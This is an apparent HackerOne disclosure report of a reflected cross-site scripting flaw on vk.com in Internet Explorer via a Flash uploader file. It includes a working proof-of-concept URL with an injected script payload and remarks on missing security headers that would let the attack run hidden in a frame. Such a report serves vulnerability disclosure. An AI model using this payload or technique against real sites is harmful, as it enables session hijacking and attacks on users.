VK.com: XSS at http://vk.com on IE using flash files

2015-06-05T09:56:45
ID H1:66121
Type hackerone
Reporter tunnelshade
Modified 2015-10-30T12:23:19

Description

Steps

  • Open the below url in Internet Explorer

http://vk.com/swf/photo_uploader_lite.swf?h=h?&onMouseOver=document.write(window.location.hash.substr(1))#<script>alert(document.domain)</script>

  • Just hover your mouse over the page.

Minor Observations

  • No "X-Content-Type-Options: nosniff" header allows IE to play the flash file directly whereas other browsers present download dialog as the content type served is application/zip.
  • No X-Frame options will allow this attack to be placed inside an iframe and run stealthily.
  • Other flash files such as http://vk.com/swf/CaptureImg.swf will also be vulnerable in a similar fashion.